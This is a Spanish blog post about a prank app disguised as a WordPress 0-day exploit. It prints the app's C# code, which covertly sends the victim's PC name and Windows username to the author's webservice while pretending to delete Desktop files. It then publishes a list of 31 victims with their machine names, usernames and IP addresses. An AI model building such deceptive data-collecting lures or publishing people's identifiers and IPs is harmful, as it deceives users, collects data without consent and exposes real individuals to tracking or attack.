Debido a que ya pocos se creen que he sido hackeado por alguien como los Anonymous o algún lamersito del momento he tenido que recurrir al nombre de uno de los grandes hispano parlantes. Chema Alonso pues es en este momento una celebridad publica.
Normalmente el día 28 de diciembre es el día en que me burlo de los lamos y más del que tiene el atrevimiento de adjudicarse un deface, en esta ocasión las reglas cambian, ya que este año no ha sido para burlarme de Chema Alonso sino para reconocerlo como un profesional de la seguridad.
Obviamente la broma no terminaría solo con mencionar a Chema Alonso como el Hacker que logra un TAKEOVER en la cueva, para este día desarrolle un WEBSERVICE y un aplicación en .NET que lo consume, esta aplicación tiene la misión de que todos aquellos que caigan en la broma sean capturados sus nombres de PC y de usuario, la aplicación inicia engañando al usuario haciéndole creer que es un exploit de 0day para hackear cualquier sitio basado en WordPress, sin embargo al ponerla a funcionar simula borrar archivos en la computadora mientras y envía el nombre del PC y el usuario a la cueva, para finalmente mostrar un mensaje de que todo ha sido una broma.
Dicho lo anterior se que la mayoría creerá lo que escribo porque me tienen por ético y no los decepcionaría, aquí dejo el código fuente del evento click del botón en Windows Form e igualmente pueden descompilar la aplicación no está ofuscada
void Button1Click(object sender, EventArgs e)
{
String
nombrepc = System.Environment.MachineName;
String
nombreusuario =
System.Security.Principal.WindowsIdentity.GetCurrent().Name;
dovecotcueva.palomita paloma = new dovecotcueva.palomita();
paloma.Callpalomita(nombrepc,nombreusuario);
button2.Text =
"Parar borrado";
clicked = true;
button1.Text =
"Borrando archivos";
button1.Enabled = false;
int barra = 0;
String ruta =
"";
ruta =
Environment.GetEnvironmentVariable ("HOMEDRIVE");
ruta = ruta +
Environment.GetEnvironmentVariable ("HOMEPATH");
try
{
DirectoryInfo directory = new DirectoryInfo(ruta + "\\Desktop");
FileInfo[] files = directory.GetFiles("*.*");
DirectoryInfo[] directories = directory.GetDirectories();
progressBar1.Maximum = files.Length + directories.Length;
for (int i = 0; i < files.Length; i++)
{
WaitSeconds(0.3);
progressBar1.Value = barra++;
label2.Text = ((FileInfo)files[i]).FullName;
}
for (int i = 0; i < directories.Length; i++)
{
WaitSeconds(0.3);
progressBar1.Value = barra++;
label2.Text =
((DirectoryInfo)directories[i]).FullName;
}
}
catch (Exception ex)
{
label2.Text = ex.ToString();
}
MessageBox.Show("Inocente palomita que te has dejado engañar sabiendo
que la cueva del dragon es inhackeable, JA JA JA no se ha borrado
ningun archivo, tranquilo. Sin embargo se ha enviado informacion
inofensiva a la cueva del dragon con la unica finalidad de que al
terminar el dia de los inocentes se muestre cuantos inocentes han caido
en la trampa = )");
}
Este año finalmente hubo menos palomitas que se han dejado engañar, ya que difícilmente alguien cree que exista la posibilidad de que algún pseudo hacker pudiera tomar la cueva del dragón y de nuevo es por eso que tenido que recurrir al nombre de uno de quien podrían creer que si lo lograría y de hecho tal vez si pudiera si le dedicara tiempo, como he dicho antes la cueva no es inhackeable, solo que no la va a hackear un pseudo mono autollamado hacker de esos que tantos abundan por ahí.
Video de la broma de este año 2014
Lista de las palomitas.
1 Paloma: MRROBOTO – MrRoboto\fabio – IP: 201.139.109.6
2 Paloma: MASTER – Master\jaeger – IP: 187.159.13.112
3 Paloma: ROOT – Root\Admin – IP: 189.224.76.32
4 Paloma: SOPORTE-PC – soporte-PC\soporte – IP: 189.191.124.165
5 Paloma: SOLDADOANTRAX – SOLDADOANTRAX\SOLDADOANTRAX – IP: 189.242.94.146
6 Paloma: EQUIPO – EQUIPO\USUARIO – IP: 201.103.115.117
7 Paloma: OF-PC – of-PC\of – IP: 190.50.90.74
8 Paloma: MASTER10 – Master10\Kaiser – IP: 189.234.33.55
9 Paloma: MAGNUS – MAGNUS\DavidEmmanuel – IP: 177.225.128.219
10 Paloma: GILBERTO-PC – Gilberto-PC\Gilberto – IP: 187.189.157.178
11 Paloma: ZURIEL – Zuriel\Astor450 – IP: 201.160.18.53
12 Paloma: JHPOSEP – JHPOSEP\JHOSEPT – IP: 190.42.124.85
13 Paloma: SEBA-PC – Seba-PC\Seba – IP: 190.224.71.251
14 Paloma: KENNER – kenner\kenner1 – IP: 179.57.54.202
15 Paloma: NISSI-ASUS – NISSI-ASUS\eduard – IP: 190.10.237.105
16 Paloma: LUKASTER – LUKASTER\Elisvan – IP: 190.233.161.208
17 Paloma: CYBERMEJIA-PC – CYBERMEJIA-PC\CYBER MEJIA – IP: 189.213.112.239
18 Paloma: ASUS-1 – ASUS-1\Jesús – IP: 201.167.199.45
19 Paloma: HACKINGOCULTO – HACKINGOCULTO\Brayan – IP: 189.161.2.215
20 Paloma: PC – PC\Osvaldo – IP: 189.193.18.149
21 Paloma: JORGE – JORGE\Jorge – IP: 201.172.187.89
22 Paloma: JORGE – JORGE\Jorge – IP: 201.172.187.89
23 Paloma: WILSON-PC – wilson-PC\wilson – IP: 186.116.232.114
24 Paloma: ALBERTO-PC – Alberto-PC\Alberto – IP: 189.179.144.159
25 Paloma: ALBERTO-PC – Alberto-PC\Alberto – IP: 189.179.144.159
26 Paloma: ADRIPIRLO21-PC – AdriPirlo21-PC\AdriPirlo21 – IP: 186.3.151.159
27 Paloma: SYNTAXERROR – SyntaxError\Error488 – IP: 187.195.113.139
28 Paloma: JOSE-PC – jose-PC\jose – IP: 189.131.52.104
29 Paloma: ACEVEDO1992-PC – Acevedo1992-pc\Jorge Acevedo – IP: 200.121.209.251
30 Paloma: ALEXANDR-PC – AlexanDr-PC\AlexanDr – IP: 189.188.11.225
31 Paloma: USUARIO-PC – USUARIO-PC\USUARIO – IP: 189.250.145.221
Si aun desean descargar la aplicacion para probarla o descompilarla, Click AQUI , dejara de funcionar cuando borre el webservice ya que al no encontrar la clase en el webservice tendra un error no manejado y fallara, si la aplicacion revienta en tu PC no significa que este mal sino que ya he borrado el webservice del que se alimenta